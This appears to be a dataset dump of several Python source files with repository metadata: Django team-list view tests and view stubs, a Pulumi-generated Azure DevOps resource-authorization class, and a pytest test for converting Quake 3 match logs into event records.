| 0
| 0.12963
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0efd93d5baa1d7af4b2db7511a7853478f91ac01
| 3,682
|
py
|
Python
|
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
# Django
from django.test import TestCase
from django.urls import reverse
from ..helper import create_team, create_user
class TestTeamListViewAsAnonymous(TestCase):
    """Team ListView accessed without authentication."""

    def tests_empty(self):
        """An empty database yields an empty team list."""
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 0)

    def tests_one_team(self):
        """A single created team appears in the list."""
        team = create_team()[1]
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 1)
        self.assertIn(team, response.context['team_list'])
class TestTeamListViewAsLogged(TestCase):
    """Team ListView accessed by a regular authenticated user."""

    def setUp(self):
        """Create a user that will be able to log in."""
        self.user_info, self.user = create_user()

    def _login(self):
        """Authenticate the test client with the stored credentials."""
        logged_in = self.client.login(
            username=self.user_info['username'],
            password=self.user_info['password'],
        )
        self.assertTrue(logged_in)

    def tests_empty(self):
        """An empty database yields an empty team list."""
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 0)

    def tests_one_team(self):
        """A single created team appears in the list."""
        team = create_team()[1]
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 1)
        self.assertIn(team, response.context['team_list'])
class TestTeamListViewAsStaff(TestCase):
    """Team ListView accessed by a staff user."""

    def setUp(self):
        """Create a staff user that will be able to log in."""
        self.user_info, self.user = create_user(staff=True)

    def _login(self):
        """Authenticate the test client with the stored credentials."""
        logged_in = self.client.login(
            username=self.user_info['username'],
            password=self.user_info['password'],
        )
        self.assertTrue(logged_in)

    def tests_empty(self):
        """An empty database yields an empty team list."""
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 0)

    def tests_one_team(self):
        """A single created team appears in the list."""
        team = create_team()[1]
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 1)
        self.assertIn(team, response.context['team_list'])
class TestTeamListViewAsSuperuser(TestCase):
    """Team ListView accessed by a superuser."""

    def setUp(self):
        """Create a superuser that will be able to log in."""
        self.user_info, self.user = create_user(superuser=True)

    def _login(self):
        """Authenticate the test client with the stored credentials."""
        logged_in = self.client.login(
            username=self.user_info['username'],
            password=self.user_info['password'],
        )
        self.assertTrue(logged_in)

    def tests_empty(self):
        """An empty database yields an empty team list."""
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 0)

    def tests_one_team(self):
        """A single created team appears in the list."""
        team = create_team()[1]
        self._login()
        response = self.client.get(reverse('sports-manager:team-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['team_list']), 1)
        self.assertIn(team, response.context['team_list'])
| 32.584071
| 116
| 0.644758
| 482
| 3,682
| 4.809129
| 0.134855
| 0.069025
| 0.077653
| 0.08283
| 0.889991
| 0.881795
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0
| 0.012479
| 0.194731
| 3,682
| 112
| 117
| 32.875
| 0.769309
| 0.093156
| 0
| 0.830508
| 0
| 0
| 0.121622
| 0.058968
| 0
| 0
| 0
| 0
| 0.440678
| 1
| 0.186441
| false
| 0.101695
| 0.050847
| 0
| 0.305085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
16021bd02d0f286f9d992c4a5790816b0decbc8c
| 205
|
py
|
Python
|
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
from django import http, views
class LoginView(views.View):
    """Stub for the login view; no handlers implemented yet."""
    pass
class LoginRequestView(views.View):
    """Stub for the login-request view; no handlers implemented yet."""
    pass
class LoginInviteView(views.View):
    """Stub for the login-invite view; no handlers implemented yet."""
    pass
class LogoutView(views.View):
    """Stub for the logout view; no handlers implemented yet."""
    pass
| 11.388889
| 35
| 0.717073
| 25
| 205
| 5.88
| 0.48
| 0.244898
| 0.353742
| 0.367347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 205
| 17
| 36
| 12.058824
| 0.896341
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1614bd379a064cf1b368c49505c5734a4185c2eb
| 16,678
|
py
|
Python
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2020-06-28T11:39:32.000Z
|
2022-03-05T13:34:16.000Z
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 58
|
2020-06-20T14:00:28.000Z
|
2022-03-31T15:20:51.000Z
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-21T03:22:01.000Z
|
2021-12-10T18:26:59.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ResourceAuthorizationArgs', 'ResourceAuthorization']
@pulumi.input_type
class ResourceAuthorizationArgs:
    """Input-argument bundle for constructing a ``ResourceAuthorization``.

    Auto-generated by the Pulumi Terraform Bridge (see file header); do not
    hand-edit the property boilerplate.  Required inputs: ``authorized``,
    ``project_id``, ``resource_id``.  Optional: ``definition_id``, ``type``.
    """
    def __init__(__self__, *,
                 authorized: pulumi.Input[bool],
                 project_id: pulumi.Input[str],
                 resource_id: pulumi.Input[str],
                 definition_id: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ResourceAuthorization resource.
        :param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
        :param pulumi.Input[str] project_id: The project ID or project name. Type: string.
        :param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
        :param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
        :param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        pulumi.set(__self__, "authorized", authorized)
        pulumi.set(__self__, "project_id", project_id)
        pulumi.set(__self__, "resource_id", resource_id)
        # Optional inputs are only recorded when explicitly provided.
        if definition_id is not None:
            pulumi.set(__self__, "definition_id", definition_id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def authorized(self) -> pulumi.Input[bool]:
        """
        Set to true to allow public access in the project. Type: boolean.
        """
        return pulumi.get(self, "authorized")
    @authorized.setter
    def authorized(self, value: pulumi.Input[bool]):
        pulumi.set(self, "authorized", value)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        The project ID or project name. Type: string.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)
    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> pulumi.Input[str]:
        """
        The ID of the resource to authorize. Type: string.
        """
        return pulumi.get(self, "resource_id")
    @resource_id.setter
    def resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_id", value)
    @property
    @pulumi.getter(name="definitionId")
    def definition_id(self) -> Optional[pulumi.Input[int]]:
        """
        The ID of the build definition to authorize. Type: string.
        """
        return pulumi.get(self, "definition_id")
    @definition_id.setter
    def definition_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "definition_id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class _ResourceAuthorizationState:
    """State snapshot used when looking up / filtering an existing
    ``ResourceAuthorization`` (see :meth:`ResourceAuthorization.get`).

    Auto-generated by the Pulumi Terraform Bridge; every field is optional
    here, unlike :class:`ResourceAuthorizationArgs`.
    """
    def __init__(__self__, *,
                 authorized: Optional[pulumi.Input[bool]] = None,
                 definition_id: Optional[pulumi.Input[int]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ResourceAuthorization resources.
        :param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
        :param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
        :param pulumi.Input[str] project_id: The project ID or project name. Type: string.
        :param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
        :param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        # Only record properties that were explicitly provided.
        if authorized is not None:
            pulumi.set(__self__, "authorized", authorized)
        if definition_id is not None:
            pulumi.set(__self__, "definition_id", definition_id)
        if project_id is not None:
            pulumi.set(__self__, "project_id", project_id)
        if resource_id is not None:
            pulumi.set(__self__, "resource_id", resource_id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def authorized(self) -> Optional[pulumi.Input[bool]]:
        """
        Set to true to allow public access in the project. Type: boolean.
        """
        return pulumi.get(self, "authorized")
    @authorized.setter
    def authorized(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "authorized", value)
    @property
    @pulumi.getter(name="definitionId")
    def definition_id(self) -> Optional[pulumi.Input[int]]:
        """
        The ID of the build definition to authorize. Type: string.
        """
        return pulumi.get(self, "definition_id")
    @definition_id.setter
    def definition_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "definition_id", value)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[pulumi.Input[str]]:
        """
        The project ID or project name. Type: string.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_id", value)
    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the resource to authorize. Type: string.
        """
        return pulumi.get(self, "resource_id")
    @resource_id.setter
    def resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
class ResourceAuthorization(pulumi.CustomResource):
    """Authorizes a resource (service endpoint, queue or variable group —
    see the ``type`` input) for use in Azure DevOps build pipelines.

    Auto-generated by the Pulumi Terraform Bridge (see file header); the two
    ``__init__`` overloads below carry the usage documentation.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 authorized: Optional[pulumi.Input[bool]] = None,
                 definition_id: Optional[pulumi.Input[int]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages authorization of resources, e.g. for access in build pipelines.
        Currently supported resources: service endpoint (aka service connection, endpoint).
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azuredevops as azuredevops
        project = azuredevops.Project("project")
        bitbucket_account = azuredevops.ServiceEndpointBitBucket("bitbucketAccount",
            project_id=project.id,
            username="xxxx",
            password="xxxx",
            service_endpoint_name="test-bitbucket",
            description="test")
        auth = azuredevops.ResourceAuthorization("auth",
            project_id=project.id,
            resource_id=bitbucket_account.id,
            authorized=True)
        ```
        ## Relevant Links
        - [Azure DevOps Service REST API 5.1 - Authorize Definition Resource](https://docs.microsoft.com/en-us/rest/api/azure/devops/build/resources/authorize%20definition%20resources?view=azure-devops-rest-5.1)
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
        :param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
        :param pulumi.Input[str] project_id: The project ID or project name. Type: string.
        :param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
        :param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ResourceAuthorizationArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages authorization of resources, e.g. for access in build pipelines.
        Currently supported resources: service endpoint (aka service connection, endpoint).
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azuredevops as azuredevops
        project = azuredevops.Project("project")
        bitbucket_account = azuredevops.ServiceEndpointBitBucket("bitbucketAccount",
            project_id=project.id,
            username="xxxx",
            password="xxxx",
            service_endpoint_name="test-bitbucket",
            description="test")
        auth = azuredevops.ResourceAuthorization("auth",
            project_id=project.id,
            resource_id=bitbucket_account.id,
            authorized=True)
        ```
        ## Relevant Links
        - [Azure DevOps Service REST API 5.1 - Authorize Definition Resource](https://docs.microsoft.com/en-us/rest/api/azure/devops/build/resources/authorize%20definition%20resources?view=azure-devops-rest-5.1)
        :param str resource_name: The name of the resource.
        :param ResourceAuthorizationArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatches between the two overloads above (kwargs vs. an Args object).
        resource_args, opts = _utilities.get_resource_args_opts(ResourceAuthorizationArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 authorized: Optional[pulumi.Input[bool]] = None,
                 definition_id: Optional[pulumi.Input[int]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id unset means we are creating a new resource (not looking one up),
        # so the required inputs must be validated and packed into __props__.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ResourceAuthorizationArgs.__new__(ResourceAuthorizationArgs)
            if authorized is None and not opts.urn:
                raise TypeError("Missing required property 'authorized'")
            __props__.__dict__["authorized"] = authorized
            __props__.__dict__["definition_id"] = definition_id
            if project_id is None and not opts.urn:
                raise TypeError("Missing required property 'project_id'")
            __props__.__dict__["project_id"] = project_id
            if resource_id is None and not opts.urn:
                raise TypeError("Missing required property 'resource_id'")
            __props__.__dict__["resource_id"] = resource_id
            __props__.__dict__["type"] = type
        # Alias for the old "azuredevops:Security/..." type token — presumably
        # kept so stacks created under that token still resolve; confirm before
        # removing.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azuredevops:Security/resourceAuthorization:ResourceAuthorization")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(ResourceAuthorization, __self__).__init__(
            'azuredevops:index/resourceAuthorization:ResourceAuthorization',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            authorized: Optional[pulumi.Input[bool]] = None,
            definition_id: Optional[pulumi.Input[int]] = None,
            project_id: Optional[pulumi.Input[str]] = None,
            resource_id: Optional[pulumi.Input[str]] = None,
            type: Optional[pulumi.Input[str]] = None) -> 'ResourceAuthorization':
        """
        Get an existing ResourceAuthorization resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
        :param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
        :param pulumi.Input[str] project_id: The project ID or project name. Type: string.
        :param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
        :param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _ResourceAuthorizationState.__new__(_ResourceAuthorizationState)
        __props__.__dict__["authorized"] = authorized
        __props__.__dict__["definition_id"] = definition_id
        __props__.__dict__["project_id"] = project_id
        __props__.__dict__["resource_id"] = resource_id
        __props__.__dict__["type"] = type
        return ResourceAuthorization(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def authorized(self) -> pulumi.Output[bool]:
        """
        Set to true to allow public access in the project. Type: boolean.
        """
        return pulumi.get(self, "authorized")
    @property
    @pulumi.getter(name="definitionId")
    def definition_id(self) -> pulumi.Output[Optional[int]]:
        """
        The ID of the build definition to authorize. Type: string.
        """
        return pulumi.get(self, "definition_id")
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Output[str]:
        """
        The project ID or project name. Type: string.
        """
        return pulumi.get(self, "project_id")
    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> pulumi.Output[str]:
        """
        The ID of the resource to authorize. Type: string.
        """
        return pulumi.get(self, "resource_id")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[Optional[str]]:
        """
        The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
        """
        return pulumi.get(self, "type")
| 42.874036
| 211
| 0.642343
| 1,899
| 16,678
| 5.441811
| 0.100053
| 0.073447
| 0.055545
| 0.044707
| 0.805013
| 0.777724
| 0.771434
| 0.742404
| 0.723534
| 0.718212
| 0
| 0.001363
| 0.252368
| 16,678
| 388
| 212
| 42.984536
| 0.827412
| 0.356458
| 0
| 0.657005
| 1
| 0
| 0.101613
| 0.019727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.024155
| 0
| 0.270531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
161d1a991d855c4a3314b25e6e716dd6d898562a
| 165
|
py
|
Python
|
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def sign_up(request):
    """Stub sign-up view; unconditionally signals success.

    NOTE(review): a wired-up Django view should return an ``HttpResponse``,
    not ``True`` — confirm before routing this in urls.py.
    """
    success = True
    return success
# Create your views here.
def sign_in(request):
    """Stub sign-in view; unconditionally signals success.

    NOTE(review): a wired-up Django view should return an ``HttpResponse``,
    not ``True`` — confirm before routing this in urls.py.
    """
    success = True
    return success
| 18.333333
| 35
| 0.745455
| 25
| 165
| 4.84
| 0.64
| 0.165289
| 0.247934
| 0.31405
| 0.429752
| 0.429752
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 9
| 36
| 18.333333
| 0.902985
| 0.284848
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1633bc57c366005e2c5f18e5959376abdd3ad66c
| 243,504
|
py
|
Python
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 21
|
2018-04-24T09:33:01.000Z
|
2022-03-05T10:53:45.000Z
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 42
|
2018-04-13T18:09:19.000Z
|
2021-08-05T20:23:22.000Z
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 8
|
2018-06-12T18:07:39.000Z
|
2021-08-28T02:26:17.000Z
|
import pytest
from quakestats.core.q3parser.api import (
Q3ParserAPI,
)
from quakestats.core.q3toql.transform import (
Q3toQL,
)
from quakestats.system.qa import ( # noqa
_regen_asserts,
)
class TestQ3toQL_OSPFFA1():
@pytest.fixture
def osp_game_1(self, testdata_loader):
ld = testdata_loader('osp-ffa-1.log')
raw_data = ld.read()
parser_api = Q3ParserAPI()
games_logs = list(parser_api.split_games(raw_data, 'osp'))
yield parser_api.parse_game_log(games_logs[0])
def test_process(self, osp_game_1,):
tf = Q3toQL()
game = tf.transform(osp_game_1)
ql_events = list(game.get_events())
e = ql_events
# py.test tests/component/test_q3toql_ospffa1.py -vs | grep assert >> tests/component/test_q3toql_ospffa1.py # noqa
# _regen_asserts(e)
assert e[0]['DATA']['CAPTURE_LIMIT'] == 0 # noqa
assert e[0]['DATA']['FACTORY'] == 'quake3' # noqa
assert e[0]['DATA']['FACTORY_TITLE'] == 'quake3' # noqa
assert e[0]['DATA']['FRAG_LIMIT'] == 20 # noqa
assert e[0]['DATA']['GAME_TYPE'] == 'FFA' # noqa
assert e[0]['DATA']['INFECTED'] == 0 # noqa
assert e[0]['DATA']['INSTAGIB'] == 0 # noqa
assert e[0]['DATA']['MAP'] == 'ASYLUM' # noqa
assert e[0]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[0]['DATA']['MERCY_LIMIT'] == 0 # noqa
assert e[0]['DATA']['PLAYERS'][0]['NAME'] == '__world__' # noqa
assert e[0]['DATA']['PLAYERS'][0]['STEAM_ID'] == 'q3-world' # noqa
assert e[0]['DATA']['PLAYERS'][0]['TEAM'] == 0 # noqa
assert e[0]['DATA']['QUADHOG'] == 0 # noqa
assert e[0]['DATA']['ROUND_LIMIT'] == 0 # noqa
assert e[0]['DATA']['SCORE_LIMIT'] == 0 # noqa
assert e[0]['DATA']['SERVER_TITLE'] == 'noname' # noqa
assert e[0]['DATA']['TIME'] == 0.0 # noqa
assert e[0]['DATA']['TIME_LIMIT'] == 0 # noqa
assert e[0]['DATA']['TRAINING'] == 0 # noqa
assert e[0]['DATA']['WARMUP'] == False # noqa
assert e[0]['TYPE'] == 'MATCH_STARTED' # noqa
assert e[1]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[1]['DATA']['NAME'] == 'Bartoszer' # noqa
assert e[1]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[1]['DATA']['TIME'] == 0.3 # noqa
assert e[1]['DATA']['WARMUP'] == False # noqa
assert e[1]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[2]['DATA']['KILLER']['NAME'] == 'Bartoszer' # noqa
assert e[2]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[2]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[2]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[2]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[2]['DATA']['TIME'] == 0.3 # noqa
assert e[2]['DATA']['WARMUP'] == False # noqa
assert e[2]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[3]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[3]['DATA']['NAME'] == 'Daemia' # noqa
assert e[3]['DATA']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[3]['DATA']['TIME'] == 0.3 # noqa
assert e[3]['DATA']['WARMUP'] == False # noqa
assert e[3]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[4]['DATA']['KILLER']['NAME'] == 'Daemia' # noqa
assert e[4]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[4]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[4]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[4]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[4]['DATA']['TIME'] == 0.3 # noqa
assert e[4]['DATA']['WARMUP'] == False # noqa
assert e[4]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[5]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[5]['DATA']['NAME'] == 'Doom' # noqa
assert e[5]['DATA']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[5]['DATA']['TIME'] == 0.3 # noqa
assert e[5]['DATA']['WARMUP'] == False # noqa
assert e[5]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[6]['DATA']['KILLER']['NAME'] == 'Doom' # noqa
assert e[6]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[6]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[6]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[6]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[6]['DATA']['TIME'] == 0.3 # noqa
assert e[6]['DATA']['WARMUP'] == False # noqa
assert e[6]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[7]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[7]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[7]['DATA']['KILLER']['ARMOR'] is None # noqa
